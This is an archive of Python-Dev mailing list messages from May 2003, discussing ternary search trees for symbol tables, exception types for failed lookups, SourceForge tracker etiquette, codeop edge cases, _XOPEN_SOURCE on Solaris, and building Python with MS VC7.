
For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
search trees a few years ago, and I think you'd enjoy reading their papers:

    http://www.cs.princeton.edu/~rs/strings/

In particular, they're faster than hashing in the failing-lookup case.
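
For flavor, here's a rough Python sketch of the idea (illustrative only; their
tuned C code is the real thing, and this assumes non-empty string keys):

class TSTNode(object):
    __slots__ = ('char', 'lo', 'eq', 'hi', 'value')
    def __init__(self, char):
        self.char = char
        self.lo = self.eq = self.hi = None
        self.value = None                  # payload for a key ending here

class TernarySearchTree(object):
    def __init__(self):
        self.root = None

    def insert(self, key, value):
        self.root = self._insert(self.root, key, 0, value)

    def _insert(self, node, key, i, value):
        char = key[i]
        if node is None:
            node = TSTNode(char)
        if char < node.char:
            node.lo = self._insert(node.lo, key, i, value)
        elif char > node.char:
            node.hi = self._insert(node.hi, key, i, value)
        elif i + 1 < len(key):
            node.eq = self._insert(node.eq, key, i + 1, value)
        else:
            node.value = value
        return node

    def search(self, key):
        # A failing lookup usually falls off the tree after a few
        # single-character comparisons -- no full key comparison needed.
        node, i = self.root, 0
        while node is not None:
            if key[i] < node.char:
                node = node.lo
            elif key[i] > node.char:
                node = node.hi
            elif i + 1 < len(key):
                node, i = node.eq, i + 1
            else:
                return node.value          # None doubles as "not found" here
        return None

t = TernarySearchTree()
t.insert('print', 1)
t.insert('probe', 2)
assert t.search('probe') == 2
assert t.search('prin') is None            # failing lookup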



From tim.one@comcast.net  Mon May 12 03:38:25 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 11 May 2003 22:38:25 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <2mist7nd62.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEGGEFAB.tim.one@comcast.net>

[Jeremy Fincher]
>>> On another related front, sets (in my Python 2.3a2) raise KeyError on a
>>> .remove(elt) when elt isn't in the set.  Since sets aren't mappings,
>>> should that be a ValueError (like list raises) instead?

[Tim]
>> Since sets aren't sequences either, why should sets raise the
>> same exception lists raise?  It's up to the type to use whichever
>> fool exceptions it chooses.  This doesn't always make life easy for
>> users, alas -- there's not much consistency in exception behavior
>> across packages.  In this case, a user would be wise to avoid
>> expecting IndexError or KeyError, and catch their common base class
>> (LookupError) instead.  The distinction between IndexError and KeyError
>> isn't really useful (IMO; LookupError was injected as a base class
>> recently in Python's life).

[Michael Hudson]
> Without me noticing, too!  Well, I knew there was a lookup error that
> you get when failing to find a codec, but I didn't know IndexError and
> KeyError derived from it...
>
> Also note that Jeremy was suggesting *ValueError*, not IndexError...

Oops!  So he was -- I spaced out on that.

> that any kind of index-or-key-ing is going on is trivia of the
> implementation, surely?

Sure.  I don't care for ValueError in this context, though -- there's
nothing wrong with the value I'm testing for set membership, after all.  Of
course I never cared for ValueError on a failing list.remove() either.  I
like ValueError best when an input is of the right type but outside the
defined domain of a function, like math.sqrt(-1.0) or chr(500).  Failing to
find something feels more like a (possibly proper subclass of) LookupError
to me.  But I'd hate to create even more useless distinctions among
different kinds of lookup failures, so am vaguely happy reusing the KeyError
flavor of LookupError.

In any case, I'm not unhappy enough with it to do something about it.  I
nevertheless agree Jerry raised a good point, and maybe somebody else is
unhappy enough with it to change it?



From agthorr@barsoom.org  Mon May 12 04:28:18 2003
From: agthorr@barsoom.org (Agthorr)
Date: Sun, 11 May 2003 20:28:18 -0700
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
References: <20030505201416.GB17384@barsoom.org> <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
Message-ID: <20030512032817.GA31824@barsoom.org>

On Sun, May 11, 2003 at 09:47:33PM -0400, Tim Peters wrote:
> Possibly, but it's fraught with difficulties.  For example, Python dicts can
> be indexed by lots of things besides 8-bit strings, and you generally need
> to know a great deal about the internal structure of a key type to generate
> a sensible hash function.  

> A more fundamental problem is that minimality can be harmful when
> failing lookups are frequent: a sparse table has a good chance of
> hitting a null entry immediately then, but a minimal table never
> does.  In the former case full-blown key comparison can be skipped
> when a null entry is hit, in the latter case full-blown key
> comparison is always needed on a failing lookup.

Both good observations.

> For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
> search trees a few years ago, and I think you'd enjoy reading their papers:
> 
>     http://www.cs.princeton.edu/~rs/strings/
> 
> In particular, they're faster than hashing in the failing-lookup case.

hhmmm.. yes, those are interesting.  Thanks :-) A few months ago I
implemented suffix trees for fun and practice.  Suffix trees are based
on tries, and I used a binary-tree for each node to keep track of its
children (which the papers point out is an equivalent way of doing
ternary trees).

(Suffix trees let you input a set of strings of total length n.  This
has a cost of O(n) time and O(n) memory.  Then, you can look to see if
a string of length m is a substring of any of the strings in the set
in O(m) time; this is impressive since the number and size of the set
of strings only matters for the setup operation; it has no effect on
the lookup speed whatsoever.)

Ternary search trees seem like a good approach for string-only
dictionaries.  A string-only dictionary seems like an inelegant
optimization, but one that might yield performance improvements in places
where non-string keys are syntactically disallowed anyway (such as the
members of a class or module).

-- Agthorr


From jack@performancedrivers.com  Mon May 12 07:16:57 2003
From: jack@performancedrivers.com (Jack Diederich)
Date: Mon, 12 May 2003 02:16:57 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>; from tim.one@comcast.net on Sun, May 11, 2003 at 09:47:33PM -0400
References: <20030505201416.GB17384@barsoom.org> <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
Message-ID: <20030512021657.C951@localhost.localdomain>

On Sun, May 11, 2003 at 09:47:33PM -0400, Tim Peters wrote:
> [Agthorr]
> > An alternate optimization would be the addition of an immutable
> > dictionary type to the language, initialized from a mutable dictionary
> > type.  Upon creation, this dictionary would optimize itself, in a
> > manner similar to the "gperf" program which creates (nearly) minimal
> > zero-collision hash tables.
>
> For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
> search trees a few years ago, and I think you'd enjoy reading their papers:
> 
>     http://www.cs.princeton.edu/~rs/strings/
> 
> In particular, they're faster than hashing in the failing-lookup case.

They nest well too.  And you can do some caching if the higher-level trees
are unchanging (local scope can shortcut into builtins).

I have a pure-python ternary tree and a C w/python wrappers ternary tree
lying around.  They were written with symbol tables in mind; I haven't touched
'em since my presentation proposal on the topic [ternary trees in general,
replacing the python symbol dict w/ t-trees as the closing example] was declined 
for the Portland OReilly thingy (bruised ego, sour grapes, et al).

Cut-n-paste from an off-list for this undying thread below.
Hettinger's idea of treaps is a good one.  A ternary-treap would also
be possible.

-jack

[Raymond]
> My thought is to use a treap.  The binary search side would scan the
> hash values while the heap part would organize from most frequent to
> least frequently accessed key.  It could even be dynamic and re-arrange
> the heap according to usage patterns.

[me]
treaps would probably be a better fit than ternary trees, especially for
builtins for the reasons you mention.  A good default ordering would
go a long way.

[me, about ternary trees]
They nest nicely, a valid 'next' node can be another ternary tree, so
pseudo code for import would be

newmodule = __import__('mymodule')
# assume __module_symdict__ is the module's symbol table
__module_symdict__['mymodule.'] = newmodule.__module_symdict__

a lookup for 'mymodule.some_function' would happily run from the
current module's tree into the 'mymodule' tree.  The '.' separator
would only remain special from a user's point of view.

If symbols don't share leading characters, ternary trees are just
binary trees that require additional bookkeeping.  This is probably
the case, so ternary trees become less neat [even if they do make for
prettier pictures].


From drifty@alum.berkeley.edu  Mon May 12 09:09:12 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Mon, 12 May 2003 01:09:12 -0700
Subject: [Python-Dev] Random SF tracker etiquette questions
Message-ID: <3EBF56A8.8090603@ocf.berkeley.edu>

First, do we care about closing RFEs?  I realized that Skip does not 
keep count of them in his weekly summary so I am not sure how much we 
care about them.  Should I waste my time wading through them to close them?

Second, when is it okay to reassign a tracker item to yourself or close 
an item that is assigned to another person?  I ask this because Fred has 
some patches assigned to him that I think I can close myself, but I 
don't want to step on his toes since they are assigned to him.

Third, when does someone warrant being mentioned in the ACKS.txt file? 
Only when they have done some significant body of work?  Or does 
committing even a one-line patch warrant inclusion?

-Brett

P.S.: Python got to #6 on SF's most active projects.  Maybe I am 
overdoing the comments on patches.  =)



From walter@livinglogic.de  Mon May 12 10:56:25 2003
From: walter@livinglogic.de (=?ISO-8859-1?Q?Walter_D=F6rwald?=)
Date: Mon, 12 May 2003 11:56:25 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>
Message-ID: <3EBF6FC9.3090805@livinglogic.de>

Tim Peters wrote:

> [...]
> For symbol table apps, Bentley & Sedgewick rehabilitated the idea of ternary
> search trees a few years ago, and I think you'd enjoy reading their papers:
> 
>     http://www.cs.princeton.edu/~rs/strings/
> 
> In particular, they're faster than hashing in the failing-lookup case.

The digital search tries mentioned in the article seem to use the
same fundamental approach as state machines, i.e. while traversing
the string, remember the string prefix that has already been
recognized. Digital search tries traverse the tree and the
memory is in the path that has been traversed. State machines
traverse a transition table and the memory is the current state.
Digital search tries seem to be easy to update, while state machines
are not.

Has anybody tried state machines for symbol tables in Python? The
size of the transition table might be a problem and any attempt
to reduce the size might kill performance in the inner loop.
Performancewise stringobject.c/string_hash() is hard to
beat (especially when the hash value is already cached).
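
For concreteness, here's a toy sketch of the approach (a per-state dict
stands in for the real transition table, so it dodges the size question
entirely):

def build_table(words):
    transitions = [{}]               # state 0 is the start state
    accept = {}                      # final state -> interned symbol
    for word in words:
        state = 0
        for ch in word:
            nxt = transitions[state].get(ch)
            if nxt is None:
                transitions.append({})
                nxt = len(transitions) - 1
                transitions[state][ch] = nxt
            state = nxt
        accept[state] = word
    return transitions, accept

def lookup(transitions, accept, word):
    state = 0
    for ch in word:
        state = transitions[state].get(ch)
        if state is None:
            return None              # failed lookup: no such transition
    return accept.get(state)         # None unless we stopped in a final state

transitions, accept = build_table(['print', 'probe', 'range'])
assert lookup(transitions, accept, 'probe') == 'probe'
assert lookup(transitions, accept, 'prin') is None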

Bye,
    Walter Dörwald



From mwh@python.net  Mon May 12 11:35:25 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 12 May 2003 11:35:25 +0100
Subject: [Python-Dev] Random SF tracker etiquette questions
In-Reply-To: <3EBF56A8.8090603@ocf.berkeley.edu> ("Brett C."'s message of
 "Mon, 12 May 2003 01:09:12 -0700")
References: <3EBF56A8.8090603@ocf.berkeley.edu>
Message-ID: <2m3cjk78r6.fsf@starship.python.net>

"Brett C." <bac@OCF.Berkeley.EDU> writes:

> First, do we care about closing RFEs?  I realized that Skip does not
> keep count of them in his weekly summary so I am not sure how much we
> care about them.  Should I waste my time wading through them to close
> them?

I remember Martin pointing out that we should prioritize patches over
bug reports, as for a patch someone has actually put some work in.  By
this light RFEs are at the bottom of the pile.

> Second, when is it okay to reassign a tracker item to yourself or
> close an item that is assigned to another person?  I ask this because
> Fred has some patches assigned to him that I think I can close myself,
> but I don't want to step on his toes since they are assigned to him.

All doc bugs get assigned to Fred by default, IIRC.  This means he
probably doesn't feel too attached to them...

> Third, when does someone warrant being mentioned in the ACKS.txt file?
> Only when they have done some significant body of work?  Or does
> committing even a one-line patch warrant inclusion?

I err on the side of adding people.  It's a judgement call.  IMHO
pointing out a typo in the docs isn't sufficient, but just about
anything that involves thinking is.

> P.S.: Python got to #6 on SF's most active projects.  Maybe I am
> overdoing the comments on patches.  =)

Nonsense!

Cheers,
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From fdrake@acm.org  Mon May 12 11:54:11 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 12 May 2003 06:54:11 -0400
Subject: [Python-Dev] Random SF tracker etiquette questions
In-Reply-To: <3EBF56A8.8090603@ocf.berkeley.edu>
References: <3EBF56A8.8090603@ocf.berkeley.edu>
Message-ID: <16063.32083.158258.152293@grendel.zope.com>

Brett C. writes:
 > Second, when is it okay to reassign a tracker item to yourself or close 
 > an item that is assigned to another person?  I ask this because Fred has 
 > some patches assigned to him that I think I can close myself, but I 
 > don't want to step on his toes since they are assigned to him.

If you have the time to review them, please feel free to reassign to
yourself.  I'm really busy with other projects at the moment, so I'm
unlikely to get to them real soon.

Thanks!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From guido@python.org  Mon May 12 12:58:19 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 12 May 2003 07:58:19 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: "Your message of Sun, 11 May 2003 22:38:25 EDT."
 <LNBBLJKPBEHFEDALKOLCCEGGEFAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEGGEFAB.tim.one@comcast.net>
Message-ID: <200305121158.h4CBwKD29921@pcp02138704pcs.reston01.va.comcast.net>

> I like ValueError best when an input is of the right type but
> outside the defined domain of a function, like math.sqrt(-1.0) or
> chr(500).  Failing to find something feels more like a (possibly
> proper subclass of) LookupError to me.

Yeah, [].remove(42) raising ValueError is a bit weird.  It was put in
before we had the concept of LookupError, and the rationale for using
ValueError was that the *value* is not found -- can't use IndexError
because the value is chosen from a different set than the index, can't
use KeyError because lists don't have a concept of key.  In
retrospect, it would have been better to define a SearchError,
subclassing LookupError.
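
Something along those lines, purely hypothetical (no such exception exists):

class SearchError(LookupError):
    """Hypothetical: a value was searched for but not found."""

def remove_first(seq, value):
    # Illustrative only; list.remove() itself raises ValueError.
    for i, item in enumerate(seq):
        if item == value:
            del seq[i]
            return
    raise SearchError("%r not found" % (value,))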

OTOH there's something to say for fewer errors, not more;
e.g. sometimes I wish AttributeError and TypeError were unified,
because AttributeError usually means that an object isn't of the
expected type.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May 12 13:11:22 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 12 May 2003 08:11:22 -0400
Subject: [Python-Dev] Random SF tracker etiquette questions
In-Reply-To: "Your message of Mon, 12 May 2003 01:09:12 PDT."
 <3EBF56A8.8090603@ocf.berkeley.edu>
References: <3EBF56A8.8090603@ocf.berkeley.edu>
Message-ID: <200305121211.h4CCBNK29988@pcp02138704pcs.reston01.va.comcast.net>

> First, do we care about closing RFEs?  I realized that Skip does not
> keep count of them in his weekly summary so I am not sure how much
> we care about them.  Should I waste my time wading through them to
> close them?

I don't think that's a waste of time.  It's good to keep track of how
much progress we make in any dimension.

> Second, when is it okay to reassign a tracker item to yourself or
> close an item that is assigned to another person?  I ask this
> because Fred has some patches assigned to him that I think I can
> close myself, but I don't want to step on his toes since they are
> assigned to him.

All doc issues are automatically assigned to Fred (maybe this needs to
be revised); I don't think he'll be offended if you take some work off
his chest.

> Third, when does someone warrant being mentioned in the ACKS.txt
> file? Only when they have done some significant body of work?  Or
> does committing even a one-line patch warrant inclusion?

I tend to add people to Misc/ACKS for any code contribution
whatsoever, including one-liners.

> -Brett
> 
> P.S.: Python got to #6 on SF's most active projects.  Maybe I am 
> overdoing the comments on patches.  =)

No, please keep it up. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@acm.org  Mon May 12 14:47:27 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 12 May 2003 09:47:27 -0400
Subject: [Python-Dev] Random SF tracker etiquette questions
In-Reply-To: <200305121211.h4CCBNK29988@pcp02138704pcs.reston01.va.comcast.net>
References: <3EBF56A8.8090603@ocf.berkeley.edu>
 <200305121211.h4CCBNK29988@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16063.42479.84510.486834@grendel.zope.com>

Guido van Rossum writes:
 > All doc issues are automatically assigned to Fred (maybe this needs to
 > be revised); I don't think he'll be offended if you take some work off
 > his chest.

Is this still the case?  I'm fairly certain I changed that, given the
amount of time I haven't been able to spend over the past several
months.  (I'm pretty sure I actually changed that last year... I'd
check but the SF website is down.)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From pedronis@bluewin.ch  Mon May 12 15:48:01 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 12 May 2003 16:48:01 +0200
Subject: [Python-Dev] codeop: small details (Q); commit priv request
Message-ID: <5.2.1.1.0.20030512140727.02362ab0@localhost>


1)

Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
 >>> import codeop
 >>> codeop.compile_command("",symbol="eval")
Traceback (most recent call last):
   File "<stdin>", line 1, in ?
   File "s:\transit\py23\lib\codeop.py", line 129, in compile_command
     return _maybe_compile(_compile, source, filename, symbol)
   File "s:\transit\py23\lib\codeop.py", line 106, in _maybe_compile
     raise SyntaxError, err1
   File "<input>", line 1
     pass
        ^
SyntaxError: invalid syntax


the error is basically an artifact of the logic that enforces:

compile_command("",symbol="single") === compile_command("pass",symbol="single")

(this makes typing enter immediately after the prompt at a simulated shell 
a nop as expected)

I would expect

compile_command("",symbol="eval")

to return None, i.e. to simply signal an incomplete expression (that is 
what would happen if the code for the "eval" case avoided the cited logic).
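
In other words, something like this hypothetical wrapper (the name is made
up; only the empty-string handling matters):

import codeop

def compile_eval_command(source, filename="<input>"):
    # An empty line just signals an incomplete expression.
    if not source.strip():
        return None
    return codeop.compile_command(source, filename, symbol="eval")

assert compile_eval_command("") is None
assert compile_eval_command("1 + 1") is not None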

2) symbol = "exec" is silently accepted but the documentation intentionally 
only refers to "exec" and "single" as valid values for symbol. Maybe a 
ValueError should be raised.

Context: I was working on improving Jython codeop compatibility with 
CPython codeop.

Btw, as considered here by Guido 
http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
I would like to ask for commit privileges for CPython.

regards





From tino.lange@isg.de  Mon May 12 15:49:37 2003
From: tino.lange@isg.de (Tino Lange)
Date: Mon, 12 May 2003 16:49:37 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>
References: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EBFB481.4070907@isg.de>

Hi!

It's still not clear to me after reading this thread:

Besides the optimizer - is it really possible to build a python.exe that 
*doesn't* depend on the .NET framework with the free download 
combination of ".NET 1.1" / "latest SDK".

Of course you can build it with the VC7.1 Pro, there's a 
framework-compiler and a standalone vc++-compiler included.

But is it also possible with the free download edition?  I thought it 
includes only the various framework compilers?

Thanks for giving me a hint.
Best regards

Tino




From barry@python.org  Mon May 12 16:15:14 2003
From: barry@python.org (Barry Warsaw)
Date: 12 May 2003 11:15:14 -0400
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <5.2.1.1.0.20030512140727.02362ab0@localhost>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <1052752514.22883.16.camel@barry>

On Mon, 2003-05-12 at 10:48, Samuele Pedroni wrote:

> Btw, as considered here by Guido 
> http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
> I would ask to have commit privileges for CPython

Done!
-Barry




From mwh@python.net  Mon May 12 16:22:22 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 12 May 2003 16:22:22 +0100
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <5.2.1.1.0.20030512140727.02362ab0@localhost> (Samuele
 Pedroni's message of "Mon, 12 May 2003 16:48:01 +0200")
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <2mvfwg5gwh.fsf@starship.python.net>

Samuele Pedroni <pedronis@bluewin.ch> writes:

> 1)
>
> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
> Type "help", "copyright", "credits" or "license" for more information.
>  >>> import codeop
>  >>> codeop.compile_command("",symbol="eval")
> Traceback (most recent call last):
>    File "<stdin>", line 1, in ?
>    File "s:\transit\py23\lib\codeop.py", line 129, in compile_command
>      return _maybe_compile(_compile, source, filename, symbol)
>    File "s:\transit\py23\lib\codeop.py", line 106, in _maybe_compile
>      raise SyntaxError, err1
>    File "<input>", line 1
>      pass
>         ^
> SyntaxError: invalid syntax
>
>
> the error is basically an artifact of the logic that enforces:
>
> compile_command("",symbol="single") === compile_command("pass",symbol="single")
>
> (this makes typing enter immediately after the prompt at a simulated
> shell a nop as expected)
>
> I would expect
>
> compile_command("",symbol="eval")
>
> to return None, i.e. to simply signal an incomplete expression (that
> is what would happen if the code for "eval" case would avoid the cited
> logic).

OK, but I think you should preserve the existing behaviour for
symbol="single".

Cheers,
M.

-- 
  I also feel it essential to note, [...], that Description Logics,
  non-Monotonic Logics, Default Logics and Circumscription Logics
  can all collectively go suck a cow. Thank you.
              -- http://advogato.org/person/Johnath/diary.html?start=4


From harri.pasanen@trema.com  Mon May 12 17:13:36 2003
From: harri.pasanen@trema.com (Harri Pasanen)
Date: Mon, 12 May 2003 18:13:36 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
Message-ID: <200305121813.36383.harri.pasanen@trema.com>

Seems that Python 2.3b1 hardcodes the value of _XOPEN_SOURCE to 600 on 
Solaris.

In configure.in:
if test $define_xopen_source = yes
then
  AC_DEFINE(_XOPEN_SOURCE, 600, 
            Define to the level of X/Open that your system supports)

Now the correct value for Solaris 2.7 in our case is 500, which is 
defined in the system headers, and boost config picks up the correct 
value.

So when compiling boost-python, there are a zillion warning messages 
about redefinition of _XOPEN_SOURCE.

Is this a problem people are aware of, and is someone fixing it as I 
write, or is a volunteer needed?

-Harri


From pedronis@bluewin.ch  Mon May 12 17:31:13 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 12 May 2003 18:31:13 +0200
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <1052752514.22883.16.camel@barry>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
 <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <5.2.1.1.0.20030512183026.01cef8c8@localhost>

At 11:15 12.05.2003 -0400, Barry Warsaw wrote:
>On Mon, 2003-05-12 at 10:48, Samuele Pedroni wrote:
>
> > Btw, as considered here by Guido
> > 
> http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
> > I would ask to have commit privileges for CPython
>
>Done!
>-Barry

Thanks. 



From pedronis@bluewin.ch  Mon May 12 17:34:21 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Mon, 12 May 2003 18:34:21 +0200
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: <2mvfwg5gwh.fsf@starship.python.net>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
 <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <5.2.1.1.0.20030512183320.01d012c8@localhost>

At 16:22 12.05.2003 +0100, Michael Hudson wrote:

> >
> > I would expect
> >
> > compile_command("",symbol="eval")
> >
> > to return None, i.e. to simply signal an incomplete expression (that
> > is what would happen if the code for "eval" case would avoid the cited
> > logic).
>
>OK, but I think you should preserve the existing behaviour for
>symbol="single".

Of course, I didn't mean otherwise. I can prepare a patch and I have also a 
somehow beefed up test_codeop. 



From tim.one@comcast.net  Mon May 12 21:58:27 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 12 May 2003 16:58:27 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <3EBF6FC9.3090805@livinglogic.de>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEIIFKAA.tim.one@comcast.net>

[Walter Dörwald]
> ...
> Has anybody tried state machines for symbol tables in Python?

Not that I know of.

> The size of the transition table might be a problem and any attempt
> to reduce the size might kill performance in the inner loop.
> Performancewise stringobject.c/string_hash() is hard to
> beat (especially when the hash value is already cached).

Which is why, if nobody ever did or ever does try alternative approaches, I
would be neither surprised nor disappointed <0.9 wink>.




From martin@v.loewis.de  Mon May 12 22:04:06 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 12 May 2003 23:04:06 +0200
Subject: [Python-Dev] Python 2.3b1 _XOPEN_SOURCE value from configure.in
In-Reply-To: <200305121813.36383.harri.pasanen@trema.com>
References: <200305121813.36383.harri.pasanen@trema.com>
Message-ID: <m3issfg9mh.fsf@mira.informatik.hu-berlin.de>

Harri Pasanen <harri.pasanen@trema.com> writes:

> So when compiling boost-python, there are zillion warning messages 
> about redefinition of  _XOPEN_SOURCE.
[...]
> Is this a problem people are aware of, and is someone fixing it as I 
> write, or is a volunteer needed?

I'm not aware of this problem specifically, but of the problem in
general. I'd claim that this is a bug in Boost. Python.h should be the
first header file included, before any header file from the
application or the system, so it gets to define the value of
_XOPEN_SOURCE. This is documented in the extensions manual.

Of course, it would be sufficient to set it to a smaller value on
systems that support only older X/Open issues; I think I'd accept a
patch that changes this (if the patch is correct, of course).

Regards,
Martin



From barry@barrys-emacs.org  Mon May 12 22:37:35 2003
From: barry@barrys-emacs.org (Barry Scott)
Date: Mon, 12 May 2003 22:37:35 +0100
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <m3ptmr2q6h.fsf@mira.informatik.hu-berlin.de>
References: <3EBCABD0.7050700@lemburg.com>
 <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
 <3EBCABD0.7050700@lemburg.com>
Message-ID: <5.1.1.6.0.20030512222353.022ade78@torment.chelsea.private>

Did I miss the answer to why bother to move to VC7?

As a C project I know of very little to recommend VC7 or VC7.1.
As a C++ developer I've decided that VC7 is little more than a broken
VC6.  Maybe Jesse Lipcon (who works for MS now) has managed to
make VC7.1 more standards compatible for C++ work, which would
recommend it to C++ developers.

Note that wxPython claims that it will not compile correctly with VC7
unless you add a work around for a bug in the code generator.

	Barry




From nhodgson@bigpond.net.au  Mon May 12 22:36:00 2003
From: nhodgson@bigpond.net.au (Neil Hodgson)
Date: Tue, 13 May 2003 07:36:00 +1000
Subject: [Python-Dev] MS VC 7 offer
References: <200305092032.h49KW5B11937@pcp02138704pcs.reston01.va.comcast.net>
 <3EBFB481.4070907@isg.de>
Message-ID: <00c701c318ce$7b249330$3da48490@neil>

Tino Lange:

> Besides the optimizer - is it really possible to build a python.exe that
> *doesn't* depend on the .NET framework with the free download
> combination of ".NET 1.1" / "latest SDK".

   The C++ compiler in the free .NET SDK download can create executables
with no dependence on the .NET runtime. There is only a small set of headers
and libraries in the .NET SDK download but a full set is in the free
Platform SDK download. IIRC, the first public beta of .NET even included the
optimizer but that was swiftly removed.

   Neil



From logistix@cathoderaymission.net  Mon May 12 23:08:56 2003
From: logistix@cathoderaymission.net (logistix)
Date: Mon, 12 May 2003 18:08:56 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <5.1.1.6.0.20030512222353.022ade78@torment.chelsea.private>
Message-ID: <000101c318d3$1583c870$20bba8c0@XP>


> -----Original Message-----
> From: python-dev-admin@python.org 
> [mailto:python-dev-admin@python.org] On Behalf Of Barry Scott
> Sent: Monday, May 12, 2003 5:38 PM
> To: 'python-dev'
> Subject: Re: [Python-Dev] MS VC 7 offer
> 
> 
> Did I miss the answer to why bother to move to VC7?
> 

Here's one reason.  You can't buy VC6.0 anymore.  I can't find any
indication of an Official End-of-life on MS's site though.

http://msdn.microsoft.com/vstudio/previous/downgrade.aspx



From tdelaney@avaya.com  Tue May 13 01:00:00 2003
From: tdelaney@avaya.com (Delaney, Timothy C (Timothy))
Date: Tue, 13 May 2003 10:00:00 +1000
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
Message-ID: <338366A6D2E2CA4C9DAEAE652E12A1DE57F1E2@au3010avexu1.global.avaya.com>

> From: Guido van Rossum [mailto:guido@python.org]
>=20
> OTOH there's something to say for fewer errors, not more;
> e.g. sometimes I wish AttributeError and TypeError were unified,
> because AttributeError usually means that an object isn't of the
> expected type.

Hmm ... I was going to ask if there was any reason not to make
AttributeError a subclass of TypeError, but that would mean that code
like:

    try:
        ...
    except TypeError:
        ...

would also catch all AttributeErrors.

Maybe we should have a __future__ directive and phase it in starting in
2.4?

I wouldn't suggest making AttributeError and TypeError be synonyms
though ... I think it is useful to distinguish the situations.

I can't think of any case in *my* code where I would want to distinguish
between a TypeError and an AttributeError - usually I end up having:

    try:
        ...
    except (TypeError, AttributeError):
        ...

Tim Delaney


From pje@telecommunity.com  Tue May 13 01:34:21 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Mon, 12 May 2003 20:34:21 -0400
Subject: [Python-Dev] os.path.walk() lacks 'depth first' option
In-Reply-To: <338366A6D2E2CA4C9DAEAE652E12A1DE57F1E2@au3010avexu1.global
 .avaya.com>
Message-ID: <5.1.1.6.0.20030512202835.03078bb0@telecommunity.com>

At 10:00 AM 5/13/03 +1000, Delaney, Timothy C (Timothy) wrote:
>I can't think of any case in *my* code where I would want to distinguish 
>between a TypeError and an AttributeError - usually I end up having:
>
>     try:
>         ...
>     except (TypeError, AttributeError):
>         ...

How odd.  I was going to say the reverse; that I *always* want to 
distinguish between the two, because TypeError almost invariably is a 
programming error of some kind, while AttributeError is nearly always an 
error that I'm checking in order to have a fallback.  E.g.:

try:
    foo = thingy.foo
except AttributeError:
    pass    # handle the default case here
else:
    foo()

However, if 'thingy.foo' were to raise any other kind of error, such as a 
TypeError, it'd probably mean that thingy had a broken 'foo' descriptor 
that I'd want to know about.



From guido@python.org  Tue May 13 02:44:41 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 12 May 2003 21:44:41 -0400
